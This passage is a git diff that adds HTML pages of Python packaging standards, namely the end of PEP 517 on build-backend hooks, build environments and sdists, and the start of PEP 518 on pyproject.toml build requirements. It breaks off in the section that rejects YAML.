Briefly, the questions to be answered include: what reasonable ways existing +of implementing an ‘editable install’? Should the backend or the frontend +pick how to make an editable install? And if the frontend does, what does it +need from the backend to do so.

+
+
+
+
+

Config settings

+
config_settings
+
+
+

This argument, which is passed to all hooks, is an arbitrary +dictionary provided as an “escape hatch” for users to pass ad-hoc +configuration into individual package builds. Build backends MAY +assign any semantics they like to this dictionary. Build frontends +SHOULD provide some mechanism for users to specify arbitrary +string-key/string-value pairs to be placed in this dictionary. +For example, they might support some syntax like --package-config CC=gcc. +In case a user provides duplicate string-keys, build frontends SHOULD +combine the corresponding string-values into a list of strings. +Build frontends MAY also provide arbitrary other mechanisms +for users to place entries in this dictionary. For example, pip +might choose to map a mix of modern and legacy command line arguments +like:

+
pip install                                           \
+  --package-config CC=gcc                             \
+  --global-option="--some-global-option"              \
+  --build-option="--build-option1"                    \
+  --build-option="--build-option2"
+
+
+

into a config_settings dictionary like:

+
{
+ "CC": "gcc",
+ "--global-option": ["--some-global-option"],
+ "--build-option": ["--build-option1", "--build-option2"],
+}
+
+
+

Of course, it’s up to users to make sure that they pass options which +make sense for the particular build backend and package that they are +building.

+

The hooks may be called with positional or keyword arguments, so backends +implementing them should be careful to make sure that their signatures match +both the order and the names of the arguments above.

+

All hooks are run with working directory set to the root of the source +tree, and MAY print arbitrary informational text on stdout and +stderr. They MUST NOT read from stdin, and the build frontend MAY +close stdin before invoking the hooks.

+

The build frontend may capture stdout and/or stderr from the backend. If the +backend detects that an output stream is not a terminal/console (e.g. +not sys.stdout.isatty()), it SHOULD ensure that any output it writes to that +stream is UTF-8 encoded. The build frontend MUST NOT fail if captured output is +not valid UTF-8, but it MAY not preserve all the information in that case (e.g. +it may decode using the replace error handler in Python). If the output stream +is a terminal, the build backend is responsible for presenting its output +accurately, as for any program running in a terminal.

+

If a hook raises an exception, or causes the process to terminate, +then this indicates an error.

+
+
+

Build environment

+

One of the responsibilities of a build frontend is to set up the +Python environment in which the build backend will run.

+

We do not require that any particular “virtual environment” mechanism +be used; a build frontend might use virtualenv, or venv, or no special +mechanism at all. But whatever mechanism is used MUST meet the +following criteria:

+
    +
  • All requirements specified by the project’s build-requirements must +be available for import from Python. In particular:
      +
    • The get_requires_for_build_wheel and get_requires_for_build_sdist hooks are +executed in an environment which contains the bootstrap requirements +specified in the pyproject.toml file.
    • +
    • The prepare_metadata_for_build_wheel and build_wheel hooks are +executed in an environment which contains the +bootstrap requirements from pyproject.toml and those specified by the +get_requires_for_build_wheel hook.
    • +
    • The build_sdist hook is executed in an environment which contains the +bootstrap requirements from pyproject.toml and those specified by the +get_requires_for_build_sdist hook.
    • +
    +
  • +
  • This must remain true even for new Python subprocesses spawned by +the build environment, e.g. code like:
    import sys, subprocess
    +subprocess.check_call([sys.executable, ...])
    +
    +
    +

    must spawn a Python process which has access to all the project’s +build-requirements. This is necessary e.g. for build backends that +want to run legacy setup.py scripts in a subprocess.

    +
  • +
  • All command-line scripts provided by the build-required packages +must be present in the build environment’s PATH. For example, if a +project declares a build-requirement on flit, then the following must +work as a mechanism for running the flit command-line tool:
    import subprocess
    +import shutil
    +subprocess.check_call([shutil.which("flit"), ...])
    +
    +
    +
  • +
+

A build backend MUST be prepared to function in any environment which +meets the above criteria. In particular, it MUST NOT assume that it +has access to any packages except those that are present in the +stdlib, or that are explicitly declared as build-requirements.

+

Frontends should call each hook in a fresh subprocess, so that backends are +free to change process global state (such as environment variables or the +working directory). A Python library will be provided which frontends can use +to easily call hooks this way.

+
+

Recommendations for build frontends (non-normative)

+

A build frontend MAY use any mechanism for setting up a build +environment that meets the above criteria. For example, simply +installing all build-requirements into the global environment would be +sufficient to build any compliant package – but this would be +sub-optimal for a number of reasons. This section contains +non-normative advice to frontend implementors.

+

A build frontend SHOULD, by default, create an isolated environment +for each build, containing only the standard library and any +explicitly requested build-dependencies. This has two benefits:

+
    +
  • It allows for a single installation run to build multiple packages +that have contradictory build-requirements. E.g. if package1 +build-requires pbr==1.8.1, and package2 build-requires pbr==1.7.2, +then these cannot both be installed simultaneously into the global +environment – which is a problem when the user requests pip +install package1 package2. Or if the user already has pbr==1.8.1 +installed in their global environment, and a package build-requires +pbr==1.7.2, then downgrading the user’s version would be rather +rude.
  • +
  • It acts as a kind of public health measure to maximize the number of +packages that actually do declare accurate build-dependencies. We +can write all the strongly worded admonitions to package authors we +want, but if build frontends don’t enforce isolation by default, +then we’ll inevitably end up with lots of packages on PyPI that +build fine on the original author’s machine and nowhere else, which +is a headache that no-one needs.
  • +
+

However, there will also be situations where build-requirements are +problematic in various ways. For example, a package author might +accidentally leave off some crucial requirement despite our best +efforts; or, a package might declare a build-requirement on foo >= +1.0 which worked great when 1.0 was the latest version, but now 1.1 +is out and it has a showstopper bug; or, the user might decide to +build a package against numpy==1.7 – overriding the package’s +preferred numpy==1.8 – to guarantee that the resulting build will be +compatible at the C ABI level with an older version of numpy (even if +this means the resulting build is unsupported upstream). Therefore, +build frontends SHOULD provide some mechanism for users to override +the above defaults. For example, a build frontend could have a +--build-with-system-site-packages option that causes the +--system-site-packages option to be passed to +virtualenv-or-equivalent when creating build environments, or a +--build-requirements-override=my-requirements.txt option that +overrides the project’s normal build-requirements.

+

The general principle here is that we want to enforce hygiene on +package authors, while still allowing end-users to open up the +hood and apply duct tape when necessary.

+
+
+
+

In-tree build backends

+

In certain circumstances, projects may wish to include the source code for the +build backend directly in the source tree, rather than referencing the backend +via the requires key. Two specific situations where this would be expected +are:

+
    +
  • Backends themselves, which want to use their own features for building +themselves (“self-hosting backends”)
  • +
  • Project-specific backends, typically consisting of a custom wrapper around a +standard backend, where the wrapper is too project-specific to be worth +distributing independently (“in-tree backends”)
  • +
+

Projects can specify that their backend code is hosted in-tree by including the +backend-path key in pyproject.toml. This key contains a list of +directories, which the frontend will add to the start of sys.path when +loading the backend, and running the backend hooks.

+

There are two restrictions on the content of the backend-path key:

+
    +
  • Directories in backend-path are interpreted as relative to the project +root, and MUST refer to a location within the source tree (after relative +paths and symbolic links have been resolved).
  • +
  • The backend code MUST be loaded from one of the directories specified in +backend-path (i.e., it is not permitted to specify backend-path and +not have in-tree backend code).
  • +
+

The first restriction is to ensure that source trees remain self-contained, +and cannot refer to locations outside of the source tree. Frontends SHOULD +check this condition (typically by resolving the location to an absolute path +and resolving symbolic links, and then checking it against the project root), +and fail with an error message if it is violated.

+

The backend-path feature is intended to support the implementation of +in-tree backends, and not to allow configuration of existing backends. The +second restriction above is specifically to ensure that this is how the feature +is used. Front ends MAY enforce this check, but are not required to. Doing so +would typically involve checking the backend’s __file__ attribute against +the locations in backend-path.

+
+
+
+

Source distributions

+

We continue with the legacy sdist format, adding some new restrictions. +This format is mostly +undefined, but basically comes down to: a file named +{NAME}-{VERSION}.{EXT}, which unpacks into a buildable source tree +called {NAME}-{VERSION}/. Traditionally these have always +contained setup.py-style source trees; we now allow them to also +contain pyproject.toml-style source trees.

+

Integration frontends require that an sdist named +{NAME}-{VERSION}.{EXT} will generate a wheel named +{NAME}-{VERSION}-{COMPAT-INFO}.whl.

+

The new restrictions for sdists built by PEP 517 backends are:

+
    +
  • They will be gzipped tar archives, with the .tar.gz extension. Zip +archives, or other compression formats for tarballs, are not allowed at +present.
  • +
  • Tar archives must be created in the modern POSIX.1-2001 pax tar format, which +uses UTF-8 for file names.
  • +
  • The source tree contained in an sdist is expected to include the +pyproject.toml file.
  • +
+
+
+

Evolutionary notes

+

A goal here is to make it as simple as possible to convert old-style +sdists to new-style sdists. (E.g., this is one motivation for +supporting dynamic build requirements.) The ideal would be that there +would be a single static pyproject.toml that could be dropped into any +“version 0” VCS checkout to convert it to the new shiny. This is +probably not 100% possible, but we can get close, and it’s important +to keep track of how close we are… hence this section.

+

A rough plan would be: Create a build system package +(setuptools_pypackage or whatever) that knows how to speak +whatever hook language we come up with, and convert them into calls to +setup.py. This will probably require some sort of hooking or +monkeypatching to setuptools to provide a way to extract the +setup_requires= argument when needed, and to provide a new version +of the sdist command that generates the new-style format. This all +seems doable and sufficient for a large proportion of packages (though +obviously we’ll want to prototype such a system before we finalize +anything here). (Alternatively, these changes could be made to +setuptools itself rather than going into a separate package.)

+

But there remain two obstacles that mean we probably won’t be able to +automatically upgrade packages to the new format:

+
    +
  1. There currently exist packages which insist on particular packages +being available in their environment before setup.py is +executed. This means that if we decide to execute build scripts in +an isolated virtualenv-like environment, then projects will need to +check whether they do this, and if so then when upgrading to the +new system they will have to start explicitly declaring these +dependencies (either via setup_requires= or via static +declaration in pyproject.toml).
  2. +
  3. There currently exist packages which do not declare consistent +metadata (e.g. egg_info and bdist_wheel might get different +install_requires=). When upgrading to the new system, projects +will have to evaluate whether this applies to them, and if so they +will need to stop doing that.
  4. +
+
+
+

Rejected options

+
    +
  • We discussed making the wheel and sdist hooks build unpacked directories +containing the same contents as their respective archives. In some cases this +could avoid the need to pack and unpack an archive, but this seems like +premature optimisation. It’s advantageous for tools to work with archives +as the canonical interchange formats (especially for wheels, where the archive +format is already standardised). Close control of archive creation is +important for reproducible builds. And it’s not clear that tasks requiring an +unpacked distribution will be more common than those requiring an archive.
  • +
  • We considered an extra hook to copy files to a build directory before invoking +build_wheel. Looking at existing build systems, we found that passing +a build directory into build_wheel made more sense for many tools than +pre-emptively copying files into a build directory.
  • +
  • The idea of passing build_wheel a build directory was then also deemed an +unnecessary complication. Build tools can use a temporary directory or a cache +directory to store intermediate files while building. If there is a need, a +frontend-controlled cache directory could be added in the future.
  • +
  • For build_sdist to signal a failure for an expected reason, various +options were debated at great length, including raising +NotImplementedError and returning either NotImplemented or None. +Please do not attempt to reopen this discussion without an extremely good +reason, because we are quite tired of it.
  • +
  • Allowing the backend to be imported from files in the source tree would be +more consistent with the way Python imports often work. However, not allowing +this prevents confusing errors from clashing module names. The initial +version of this PEP did not provide a means to allow backends to be +imported from files within the source tree, but the backend-path key +was added in the next revision to allow projects to opt into this behaviour +if needed.
  • +
+
+
+

Summary of changes to PEP 517

+

The following changes were made to this PEP after the initial reference +implementation was released in pip 19.0.

+
    +
  • Cycles in build requirements were explicitly prohibited.
  • +
  • Support for in-tree backends and self-hosting of backends was added by +the introduction of the backend-path key in the [build-system] +table.
  • +
  • Clarified that the setuptools.build_meta:__legacy__ PEP 517 backend is +an acceptable alternative to directly invoking setup.py for source trees +that don’t specify build-backend explicitly.
  • +
+
+
+

Appendix A: Comparison to PEP 516

+

PEP 516 is a competing proposal to specify a build system interface, which +has now been rejected in favour of this PEP. The primary difference is +that our build backend is defined via a Python hook-based interface +rather than a command-line based interface.

+

This appendix documents the arguments advanced for this PEP over PEP 516.

+

We do not expect that specifying Python hooks rather than command line +interfaces will, by itself, reduce the +complexity of calling into the backend, because build frontends will +in any case want to run hooks inside a child – this is important to +isolate the build frontend itself from the backend code and to better +control the build backends execution environment. So under both +proposals, there will need to be some code in pip to spawn a +subprocess and talk to some kind of command-line/IPC interface, and +there will need to be some code in the subprocess that knows how to +parse these command line arguments and call the actual build backend +implementation. So this diagram applies to all proposals equally:

+
+-----------+          +---------------+           +----------------+
+| frontend  | -spawn-> | child cmdline | -Python-> |    backend     |
+|   (pip)   |          |   interface   |           | implementation |
++-----------+          +---------------+           +----------------+
+
+
+

The key difference between the two approaches is how these interface +boundaries map onto project structure:

+
.-= This PEP =-.
+
++-----------+          +---------------+    |      +----------------+
+| frontend  | -spawn-> | child cmdline | -Python-> |    backend     |
+|   (pip)   |          |   interface   |    |      | implementation |
++-----------+          +---------------+    |      +----------------+
+                                            |
+|______________________________________|    |
+   Owned by pip, updated in lockstep        |
+                                            |
+                                            |
+                                 PEP-defined interface boundary
+                               Changes here require distutils-sig
+
+
+.-= Alternative =-.
+
++-----------+    |     +---------------+           +----------------+
+| frontend  | -spawn-> | child cmdline | -Python-> |    backend     |
+|   (pip)   |    |     |   interface   |           | implementation |
++-----------+    |     +---------------+           +----------------+
+                 |
+                 |     |____________________________________________|
+                 |      Owned by build backend, updated in lockstep
+                 |
+    PEP-defined interface boundary
+  Changes here require distutils-sig
+
+
+

By moving the PEP-defined interface boundary into Python code, we gain +three key advantages.

+

First, because there will likely be only a small number of build +frontends (pip, and… maybe a few others?), while there will +likely be a long tail of custom build backends (since these are chosen +separately by each package to match their particular build +requirements), the actual diagrams probably look more like:

+
.-= This PEP =-.
+
++-----------+          +---------------+           +----------------+
+| frontend  | -spawn-> | child cmdline | -Python+> |    backend     |
+|   (pip)   |          |   interface   |        |  | implementation |
++-----------+          +---------------+        |  +----------------+
+                                                |
+                                                |  +----------------+
+                                                +> |    backend     |
+                                                |  | implementation |
+                                                |  +----------------+
+                                                :
+                                                :
+
+.-= Alternative =-.
+
++-----------+          +---------------+           +----------------+
+| frontend  | -spawn+> | child cmdline | -Python-> |    backend     |
+|   (pip)   |       |  |   interface   |           | implementation |
++-----------+       |  +---------------+           +----------------+
+                    |
+                    |  +---------------+           +----------------+
+                    +> | child cmdline | -Python-> |    backend     |
+                    |  |   interface   |           | implementation |
+                    |  +---------------+           +----------------+
+                    :
+                    :
+
+
+

That is, this PEP leads to less total code in the overall +ecosystem. And in particular, it reduces the barrier to entry of +making a new build system. For example, this is a complete, working +build backend:

+
# mypackage_custom_build_backend.py
+import os.path
+import pathlib
+import shutil
+import tarfile
+
+SDIST_NAME = "mypackage-0.1"
+SDIST_FILENAME = SDIST_NAME + ".tar.gz"
+WHEEL_FILENAME = "mypackage-0.1-py2.py3-none-any.whl"
+
+#################
+# sdist creation
+#################
+
+def _exclude_hidden_and_special_files(archive_entry):
+    """Tarfile filter to exclude hidden and special files from the archive"""
+    if archive_entry.isfile() or archive_entry.isdir():
+        if not os.path.basename(archive_entry.name).startswith("."):
+            return archive_entry
+
+def _make_sdist(sdist_dir):
+    """Make an sdist and return both the Python object and its filename"""
+    sdist_path = pathlib.Path(sdist_dir) / SDIST_FILENAME
+    sdist = tarfile.open(sdist_path, "w:gz", format=tarfile.PAX_FORMAT)
+    # Tar up the whole directory, minus hidden and special files
+    sdist.add(os.getcwd(), arcname=SDIST_NAME,
+              filter=_exclude_hidden_and_special_files)
+    return sdist, SDIST_FILENAME
+
+def build_sdist(sdist_dir, config_settings):
+    """PEP 517 sdist creation hook"""
+    sdist, sdist_filename = _make_sdist(sdist_dir)
+    return sdist_filename
+
+#################
+# wheel creation
+#################
+
+def get_requires_for_build_wheel(config_settings):
+    """PEP 517 wheel building dependency definition hook"""
+    # As a simple static requirement, this could also just be
+    # listed in the project's build system dependencies instead
+    return ["wheel"]
+
+def build_wheel(wheel_directory,
+                metadata_directory=None, config_settings=None):
+    """PEP 517 wheel creation hook"""
+    from wheel.archive import archive_wheelfile
+    path = os.path.join(wheel_directory, WHEEL_FILENAME)
+    archive_wheelfile(path, "src/")
+    return WHEEL_FILENAME
+
+
+

Of course, this is a terrible build backend: it requires the user to +have manually set up the wheel metadata in +src/mypackage-0.1.dist-info/; when the version number changes it +must be manually updated in multiple places… but it works, and more features +could be added incrementally. Much experience suggests that large successful +projects often originate as quick hacks (e.g., Linux – “just a hobby, +won’t be big and professional”; IPython/Jupytera grad +student’s $PYTHONSTARTUP file), +so if our goal is to encourage the growth of a vibrant ecosystem of +good build tools, it’s important to minimize the barrier to entry.

+

Second, because Python provides a simpler yet richer structure for +describing interfaces, we remove unnecessary complexity from the +specification – and specifications are the worst place for +complexity, because changing specifications requires painful +consensus-building across many stakeholders. In the command-line +interface approach, we have to come up with ad hoc ways to map +multiple different kinds of inputs into a single linear command line +(e.g. how do we avoid collisions between user-specified configuration +arguments and PEP-defined arguments? how do we specify optional +arguments? when working with a Python interface these questions have +simple, obvious answers). When spawning and managing subprocesses, +there are many fiddly details that must be gotten right, subtle +cross-platform differences, and some of the most obvious approaches – +e.g., using stdout to return data for the build_requires operation +– can create unexpected pitfalls (e.g., what happens when computing +the build requirements requires spawning some child processes, and +these children occasionally print an error message to stdout? +obviously a careful build backend author can avoid this problem, but +the most obvious way of defining a Python interface removes this +possibility entirely, because the hook return value is clearly +demarcated).

+

In general, the need to isolate build backends into their own process +means that we can’t remove IPC complexity entirely – but by placing +both sides of the IPC channel under the control of a single project, +we make it much cheaper to fix bugs in the IPC interface than if +fixing bugs requires coordinated agreement and coordinated changes +across the ecosystem.

+

Third, and most crucially, the Python hook approach gives us much +more powerful options for evolving this specification in the future.

+

For concreteness, imagine that next year we add a new +build_sdist_from_vcs hook, which provides an alternative to the current +build_sdist hook where the frontend is responsible for passing +version control tracking metadata to backends (including indicating when all +on disk files are tracked), rather than individual backends having to query that +information themselves. In order to manage the transition, we’d want it to be +possible for build frontends to transparently use build_sdist_from_vcs when +available and fall back onto build_sdist otherwise; and we’d want it to be +possible for build backends to define both methods, for compatibility +with both old and new build frontends.

+

Furthermore, our mechanism should also fulfill two more goals: (a) If +new versions of e.g. pip and flit are both updated to support +the new interface, then this should be sufficient for it to be used; +in particular, it should not be necessary for every project that +uses flit to update its individual pyproject.toml file. (b) +We do not want to have to spawn extra processes just to perform this +negotiation, because process spawns can easily become a bottleneck when +deploying large multi-package stacks on some platforms (Windows).

+

In the interface described here, all of these goals are easy to +achieve. Because pip controls the code that runs inside the child +process, it can easily write it to do something like:

+
command, backend, args = parse_command_line_args(...)
+if command == "build_sdist":
+   if hasattr(backend, "build_sdist_from_vcs"):
+       backend.build_sdist_from_vcs(...)
+   elif hasattr(backend, "build_sdist"):
+       backend.build_sdist(...)
+   else:
+       # error handling
+
+
+

In the alternative where the public interface boundary is placed at +the subprocess call, this is not possible – either we need to spawn +an extra process just to query what interfaces are supported (as was +included in an earlier draft of PEP 516, an alternative to this), or +else we give up on autonegotiation entirely (as in the current version +of that PEP), meaning that any changes in the interface will require +N individual packages to update their pyproject.toml files before +any change can go live, and that any changes will necessarily be +restricted to new releases.

+

One specific consequence of this is that in this PEP, we’re able to +make the prepare_metadata_for_build_wheel command optional. In our design, +this can be readily handled by build frontends, which can put code in +their subprocess runner like:

+
def dump_wheel_metadata(backend, working_dir):
+    """Dumps wheel metadata to working directory.
+
+       Returns absolute path to resulting metadata directory
+    """
+    if hasattr(backend, "prepare_metadata_for_build_wheel"):
+        subdir = backend.prepare_metadata_for_build_wheel(working_dir)
+    else:
+        wheel_fname = backend.build_wheel(working_dir)
+        already_built = os.path.join(working_dir, "ALREADY_BUILT_WHEEL")
+        with open(already_built, "w") as f:
+            f.write(wheel_fname)
+        subdir = unzip_metadata(os.path.join(working_dir, wheel_fname))
+    return os.path.join(working_dir, subdir)
+
+def ensure_wheel_is_built(backend, output_dir, working_dir, metadata_dir):
+    """Ensures built wheel is available in output directory
+
+       Returns absolute path to resulting wheel file
+    """
+    already_built = os.path.join(working_dir, "ALREADY_BUILT_WHEEL")
+    if os.path.exists(already_built):
+        with open(already_built, "r") as f:
+            wheel_fname = f.read().strip()
+        working_path = os.path.join(working_dir, wheel_fname)
+        final_path = os.path.join(output_dir, wheel_fname)
+        os.rename(working_path, final_path)
+        os.remove(already_built)
+    else:
+        wheel_fname = backend.build_wheel(output_dir, metadata_dir=metadata_dir)
+    return os.path.join(output_dir, wheel_fname)
+
+
+

and thus expose a totally uniform interface to the rest of the frontend, +with no extra subprocess calls, no duplicated builds, etc. But +obviously this is the kind of code that you only want to write as part +of a private, within-project interface (e.g. the given example requires that +the working directory be shared between the two calls, but not with any +other wheel builds, and that the return value from the metadata helper function +will be passed back in to the wheel building one).

+

(And, of course, making the metadata command optional is one piece +of lowering the barrier to entry for developing new backends, as discussed +above.)

+
+

Other differences

+

Besides the key command line versus Python hook difference described +above, there are a few other differences in this proposal:

+
    +
  • Metadata command is optional (as described above).
  • +
  • We return metadata as a directory, rather than a single METADATA +file. This aligns better with the way that in practice wheel metadata +is distributed across multiple files (e.g. entry points), and gives us +more options in the future. (For example, instead of following the PEP +426 proposal of switching the format of METADATA to JSON, we might +decide to keep the existing METADATA the way it is for backcompat, +while adding new extensions as JSON “sidecar” files inside the same +directory. Or maybe not; the point is it keeps our options more open.)
  • +
  • We provide a mechanism for passing information between the metadata +step and the wheel building step. I guess everyone probably will +agree this is a good idea?
  • +
  • We provide more detailed recommendations about the build environment, +but these aren’t normative anyway.
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0517.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0518/index.html b/pep-0518/index.html new file mode 100644 index 00000000000..2dfd54beee5 --- /dev/null +++ b/pep-0518/index.html @@ -0,0 +1,719 @@ + + + + + + + + PEP 518 – Specifying Minimum Build System Requirements for Python Projects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 518 – Specifying Minimum Build System Requirements for Python Projects

+
+
Author:
+
Brett Cannon <brett at python.org>, +Nathaniel J. Smith <njs at pobox.com>, +Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
10-May-2016
+
Post-History:
+
10-May-2016, +11-May-2016, +13-May-2016
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies how Python software packages should specify what +build dependencies they have in order to execute their chosen build +system. As part of this specification, a new configuration file is +introduced for software packages to use to specify their build +dependencies (with the expectation that the same configuration file +will be used for future configuration details).

+
+
+

Rationale

+

When Python first developed its tooling for building distributions of +software for projects, distutils [1] was the chosen +solution. As time went on, setuptools [2] gained popularity +to add some features on top of distutils. Both used the concept of a +setup.py file that project maintainers executed to build +distributions of their software (as well as users to install said +distribution).

+

Using an executable file to specify build requirements under distutils +isn’t an issue as distutils is part of Python’s standard library. +Having the build tool as part of Python means that a setup.py has +no external dependency that a project maintainer needs to worry about +to build a distribution of their project. There was no need to specify +any dependency information as the only dependency is Python.

+

But when a project chooses to use setuptools, the use of an executable +file like setup.py becomes an issue. You can’t execute a +setup.py file without knowing its dependencies, but currently +there is no standard way to know what those dependencies are in an +automated fashion without executing the setup.py file where that +information is stored. It’s a catch-22 of a file not being runnable +without knowing its own contents which can’t be known programmatically +unless you run the file.

+

Setuptools tried to solve this with a setup_requires argument to +its setup() function [3]. This solution has a number +of issues, such as:

+
    +
  • No tooling (besides setuptools itself) can access this information +without executing the setup.py, but setup.py can’t be +executed without having these items installed.
  • +
  • While setuptools itself will install anything listed in this, they +won’t be installed until during the execution of the setup() +function, which means that the only way to actually use anything +added here is through increasingly complex machinations that delay +the import and usage of these modules until later on in the +execution of the setup() function.
  • +
  • This cannot include setuptools itself nor can it include a +replacement to setuptools, which means that projects such as +numpy.distutils are largely incapable of utilizing it and +projects cannot take advantage of newer setuptools features until +their users naturally upgrade the version of setuptools to a newer +one.
  • +
  • The items listed in setup_requires get implicitly installed +whenever you execute the setup.py but one of the common ways +that the setup.py is executed is via another tool, such as +pip, who is already managing dependencies. This means that +a command like pip install spam might end up having both +pip and setuptools downloading and installing packages and end +users needing to configure both tools (and for setuptools +without being in control of the invocation) to change settings +like which repository it installs from. It also means that users +need to be aware of the discovery rules for both tools, as one +may support different package formats or determine the latest +version differently.
  • +
+

This has culminated in a situation where use of setup_requires +is rare, where projects tend to either simply copy and paste snippets +between setup.py files or they eschew it all together in favor +of simply documenting elsewhere what they expect the user to have +manually installed prior to attempting to build or install their +project.

+

All of this has led pip [4] to simply assume that setuptools is +necessary when executing a setup.py file. The problem with this, +though, is it doesn’t scale if another project began to gain traction +in the community as setuptools has. It also prevents other projects +from gaining traction due to the friction required to use it with a +project when pip can’t infer the fact that something other than +setuptools is required.

+

This PEP attempts to rectify the situation by specifying a way to list +the minimal dependencies of the build system of a project in a +declarative fashion in a specific file. This allows a project to list +what build dependencies it has to go from e.g. source checkout to +wheel, while not falling into the catch-22 trap that a setup.py +has where tooling can’t infer what a project needs to build itself. +Implementing this PEP will allow projects to specify what build system +they depend on upfront so that tools like pip can make sure that they +are installed in order to run the build system to build the project.

+

To provide more context and motivation for this PEP, think of the +(rough) steps required to produce a built artifact for a project:

+
    +
  1. The source checkout of the project.
  2. +
  3. Installation of the build system.
  4. +
  5. Execute the build system.
  6. +
+

This PEP covers step #2. PEP 517 covers step #3, including how to have +the build system dynamically specify more dependencies that the build +system requires to perform its job. The purpose of this PEP though, is +to specify the minimal set of requirements for the build system to +simply begin execution.

+
+
+

Specification

+
+

File Format

+

The build system dependencies will be stored in a file named +pyproject.toml that is written in the TOML format [6].

+

This format was chosen as it is human-usable (unlike JSON [7]), +it is flexible enough (unlike configparser [9]), stems +from a standard (also unlike configparser [9]), and it +is not overly complex (unlike YAML [8]). The TOML format is +already in use by the Rust community as part of their +Cargo package manager [14] and in private email stated they have +been quite happy with their choice of TOML. A more thorough +discussion as to why various alternatives were not chosen can be read +in the Other file formats section. The authors do realize, though, +that choice of configuration file format is ultimately subjective and +a choice had to be made and the authors prefer TOML for this situation.

+

Below we list the tables that tools are expected to recognize/respect. +Tables not specified in this PEP are reserved for future use by other +PEPs.

+
+
+

build-system table

+

The [build-system] table is used to store build-related data. +Initially only one key of the table will be valid and is mandatory +for the table: requires. This key must have a value of a list +of strings representing PEP 508 dependencies required to execute the +build system (currently that means what dependencies are required to +execute a setup.py file).

+

For the vast majority of Python projects that rely upon setuptools, +the pyproject.toml file will be:

+
[build-system]
+# Minimum requirements for the build system to execute.
+requires = ["setuptools", "wheel"]  # PEP 508 specifications.
+
+
+

Because the use of setuptools and wheel are so expansive in the +community at the moment, build tools are expected to use the example +configuration file above as their default semantics when a +pyproject.toml file is not present.

+

Tools should not require the existence of the [build-system] table. +A pyproject.toml file may be used to store configuration details +other than build-related data and thus lack a [build-system] table +legitimately. If the file exists but is lacking the [build-system] +table then the default values as specified above should be used. +If the table is specified but is missing required fields then the tool +should consider it an error.

+
+
+

tool table

+

The [tool] table is where any tool related to your Python +project, not just build tools, can have users specify configuration +data as long as they use a sub-table within [tool], e.g. the +flit tool would store its +configuration in [tool.flit].

+

We need some mechanism to allocate names within the tool.* +namespace, to make sure that different projects don’t attempt to use +the same sub-table and collide. Our rule is that a project can use +the subtable tool.$NAME if, and only if, they own the entry for +$NAME in the Cheeseshop/PyPI.

+
+
+

JSON Schema

+

To provide a type-specific representation of the resulting data from +the TOML file for illustrative purposes only, the following JSON +Schema [15] would match the data format:

+
{
+    "$schema": "http://json-schema.org/schema#",
+
+    "type": "object",
+    "additionalProperties": false,
+
+    "properties": {
+        "build-system": {
+            "type": "object",
+            "additionalProperties": false,
+
+            "properties": {
+                "requires": {
+                    "type": "array",
+                    "items": {
+                        "type": "string"
+                    }
+                }
+            },
+            "required": ["requires"]
+        },
+
+        "tool": {
+            "type": "object"
+        }
+    }
+}
+
+
+
+
+
+

Rejected Ideas

+
+

A semantic version key

+

For future-proofing the structure of the configuration file, a +semantics-version key was initially proposed. Defaulting to 1, +the idea was that if any semantics changes to previously defined keys +or tables occurred which were not backwards-compatible, then the +semantics-version would be incremented to a new number.

+

In the end, though, it was decided that this was a premature +optimization. The expectation is that changes to what is pre-defined +semantically in the configuration file will be rather conservative. +And in the instances where a backwards-incompatible change would have +occurred, different names can be used for the new semantics to avoid +breaking older tools.

+
+
+

A more nested namespace

+

An earlier draft of this PEP had a top-level [package] table. The +idea was to impose some scoping for a semantics versioning scheme +(see A semantic version key for why that idea was rejected). +With the need for scoping removed, the point of having a top-level +table became superfluous.

+
+
+

Other table names

+

Another name proposed for the [build-system] table was +[build]. The alternative name is shorter, but doesn’t convey as +much of the intention of what information is stored in the table. After +a vote on the distutils-sig mailing list, the current name won out.

+
+
+

Other file formats

+

Several other file formats were put forward for consideration, all +rejected for various reasons. Key requirements were that the format +be editable by human beings and have an implementation that can be +vendored easily by projects. This outright excluded certain formats +like XML which are not friendly towards human beings and were never +seriously discussed.

+
+

Overview of file formats considered

+

The key reasons for rejecting the other alternatives considered are +summarised in the following sections, while the full review (including +positive arguments in favour of TOML) can be found at [16].

+

TOML was ultimately selected as it provided all the features we +were interested in, while avoiding the downsides introduced by +the alternatives.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FeatureTOMLYAMLJSONCFG/INI
Well-definedyesyesyes
Real data typesyesyesyes
Reliable Unicodeyesyesyes
Reliable commentsyesyes
Easy for humans to edityes????
Easy for tools to edityes??yes??
In standard libraryyesyes
Easy for pip to vendoryesn/an/a
+

(“??” in the table indicates items where most folks would be +inclined to answer “yes”, but there turn out to be a lot of +quirks and edge cases that arise in practice due to either +the lack of a clear specification, or else the underlying +file format specification being surprisingly complicated)

+

The pytoml TOML parser is ~300 lines of pure Python code, +so being outside the standard library didn’t count heavily +against it.

+

Python literals were also discussed as a potential format, but +weren’t considered in the file format review (since they’re not +a common pre-existing file format).

+
+
+

JSON

+

The JSON format [7] was initially considered but quickly +rejected. While great as a human-readable, string-based data exchange +format, the syntax does not lend itself to easy editing by a human +being (e.g. the syntax is more verbose than necessary while not +allowing for comments).

+

An example JSON file for the proposed data would be:

+
{
+    "build": {
+        "requires": [
+            "setuptools",
+            "wheel>=0.27"
+        ]
+    }
+}
+
+
+
+
+

YAML

+

The YAML format [8] was designed to be a superset of JSON +[7] while being easier to work with by hand. There are three main +issues with YAML.

+

One is that the specification is large: 86 pages if printed on +letter-sized paper. That leaves the possibility that someone may use a +feature of YAML that works with one parser but not another. It has +been suggested to standardize on a subset, but that basically means +creating a new standard specific to this file which is not tractable +long-term.

+

